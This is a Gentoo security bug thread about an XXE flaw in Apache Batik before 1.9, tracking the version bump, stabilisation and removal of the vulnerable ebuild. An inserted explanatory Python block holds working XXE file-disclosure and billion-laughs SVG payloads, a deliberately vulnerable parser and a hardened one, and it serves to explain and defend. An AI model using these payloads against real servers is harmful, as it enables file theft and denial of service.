In Apache Batik before 1.9, files lying on the filesystem of the server that uses Batik can be revealed to arbitrary users who send maliciously formed SVG files. The file types that can be shown depend on the user context in which the exploitable application is running. If the user is root, a full compromise of the server, including confidential or sensitive files, would be possible. XXE can also be used to attack the availability of the server via denial of service, as the references within an XML document can trivially trigger an amplification attack.

References:
https://xmlgraphics.apache.org/security.html
http://seclists.org/oss-sec/2017/q2/85

@maintainer(s): after the bump, in case we need to stabilize the package, please let us know whether it is ready for stabilization or not.
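The two attack classes the report above describes, shown as an added example that is not part of this bug report or of Batik's code: a constructed SVG whose DOCTYPE declares an external entity pointing at a file on disk, and a constructed nested-entity ("billion laughs") SVG. Python's expat stands in for the Java XML stack here; parse_svg_vulnerable installs a resolver that fetches external entities the way a default Xerces/JAXP configuration does on its own, while parse_svg_hardened refuses any DOCTYPE, which removes both entity declarations and external references in one step. The secret file, its path, the entity names and the function names are all made up for the demonstration.

```python
"""XXE against an SVG consumer: file disclosure and entity amplification.

Added example, not Batik code. Python's expat stands in for the Java XML
stack; the SVG payloads, secret file and entity names are constructed here.
"""
import os
import pathlib
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlparse
from urllib.request import url2pathname


class XXEBlocked(Exception):
    """Raised by the hardened parser when an SVG carries a DOCTYPE."""


def svg_with_external_entity(system_id: str) -> bytes:
    """Constructed SVG whose <text> element expands an external entity."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE svg [\n'
        f'  <!ENTITY xxe SYSTEM "{system_id}">\n'
        ']>\n'
        '<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>'
    ).encode()


# Constructed amplification payload: 253 bytes of input expand to 3900
# characters of text, because each entity level is ten copies of the previous.
BILLION_LAUGHS_SVG = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE svg [\n'
    '  <!ENTITY a "lol lol lol lol lol lol lol lol lol lol">\n'
    '  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">\n'
    '  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">\n'
    ']>\n'
    '<svg xmlns="http://www.w3.org/2000/svg"><text>&c;</text></svg>'
).encode()


def parse_svg_vulnerable(data: bytes) -> str:
    """Return the text content of the SVG, resolving external entities.

    Expat only fetches external entities when a handler is installed; this
    handler reads the referenced file and splices it into the document, which
    is what a default Xerces/JAXP setup does without being asked.
    """
    text = []
    parser = expat.ParserCreate()

    def fetch_external(context, base, system_id, public_id):
        path = url2pathname(urlparse(system_id).path)
        with open(path, "rb") as fh:
            child = parser.ExternalEntityParserCreate(context)
            child.Parse(fh.read(), True)  # child shares the parent's handlers
        return 1

    parser.CharacterDataHandler = text.append
    parser.ExternalEntityRefHandler = fetch_external
    parser.Parse(data, True)
    return "".join(text)


def parse_svg_hardened(data: bytes) -> str:
    """Return the text content of the SVG, refusing any DOCTYPE.

    An SVG has no legitimate need for an internal DTD subset; rejecting the
    DOCTYPE removes external entities and nested-entity amplification alike.
    No ExternalEntityRefHandler is installed, so even if a DOCTYPE slipped
    through, expat would skip external references instead of fetching them.
    """
    text = []
    parser = expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise XXEBlocked(f"DOCTYPE rejected in SVG (root element {name!r})")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)
    return "".join(text)


def is_blocked(data: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_svg_hardened(data)
    except XXEBlocked:
        return True
    return False


def demo_file_disclosure() -> dict:
    """Plant a secret in a temp file; only the vulnerable parser leaks it."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w") as fh:
            fh.write("hunter2")  # constructed secret, stands in for /etc/passwd
        svg = svg_with_external_entity(pathlib.Path(secret_path).as_uri())
        return {"leaked": parse_svg_vulnerable(svg), "blocked": is_blocked(svg)}


if __name__ == "__main__":
    print(demo_file_disclosure())
    expanded = parse_svg_vulnerable(BILLION_LAUGHS_SVG)
    print(len(BILLION_LAUGHS_SVG), "bytes in ->", len(expanded), "chars out")
    print("hardened parser blocks amplification:", is_blocked(BILLION_LAUGHS_SVG))
```

The file-disclosure half only works because the vulnerable resolver runs with whatever filesystem rights the parsing process has, which is the "user context" point in the report: the same payload read by a root-owned service reads anything. Rejecting the DOCTYPE outright is the cheapest hardening; a consumer that must accept DTDs instead needs external general and parameter entities disabled and an expansion limit on internal ones.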
@Maintainer(s): Please bump to >=dev-java/batik-1.9. I submitted a PR for review: https://github.com/gentoo/gentoo/pull/4850
Ping. From the URL: Stefan Cornelius 2017-07-05 07:38:53 EDT
Upstream bug: https://issues.apache.org/jira/browse/BATIK-1139
Patches:
http://svn.apache.org/viewvc?view=revision&revision=1742892
http://svn.apache.org/viewvc?view=revision&revision=1743326

Gentoo Security Padawan
ChrisADR
commit 2bd8da0fc9240f6d7a9163470e952e26126cf392 (HEAD -> master, origin/master, origin/HEAD)
Author: Thomas Deutschmann <whissi@gentoo.org>
AuthorDate: Sun Jun 4 20:49:47 2017 +0200
Commit: Patrice Clement <monsieurp@gentoo.org>
CommitDate: Tue Aug 1 22:43:40 2017 +0200

    dev-java/batik: version bump to 1.9.

    Gentoo-Bug: https://bugs.gentoo.org/616476
    Package-Manager: Portage-2.3.5, Repoman-2.3.2
    Closes: https://github.com/gentoo/gentoo/pull/4850

 dev-java/batik/Manifest         |   1 +
 dev-java/batik/batik-1.9.ebuild | 101 ++++++++++++++++++++++++++++++++++++++++
 2 files changed, 102 insertions(+)
 create mode 100644 dev-java/batik/batik-1.9.ebuild

Please proceed.
@arches, please stabilize.
If bug #628812 isn't an issue (due to the security status) it's ok to mark stable for x86. Rdeps build as well against this version.
(In reply to Myckel Habets (work) from comment #5)
> If bug #628812 isn't an issue (due to the security status) it's ok to mark
> stable for x86. Rdeps build as well against this version.

amd64 tested, same problem with the tcl USE flag; refer to bug #628812 for more details about the test.
ppc64 stable
x86 stable
amd64 stable. Maintainer(s), please cleanup. Security, please vote.
GLSA Vote: No
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=559cca9d8919f426d7cb1f7998c8d4e9fa3ee476

commit 559cca9d8919f426d7cb1f7998c8d4e9fa3ee476
Author: Patrice Clement <monsieurp@gentoo.org>
AuthorDate: 2017-10-27 18:30:06 +0000
Commit: Patrice Clement <monsieurp@gentoo.org>
CommitDate: 2017-10-27 18:30:06 +0000

    dev-java/batik: remove vulnerable version.

    Bug: https://bugs.gentoo.org/616476
    Package-Manager: Portage-2.3.8, Repoman-2.3.3

 dev-java/batik/Manifest            |   1 -
 dev-java/batik/batik-1.8-r3.ebuild | 124 -------------------------------------
 2 files changed, 125 deletions(-)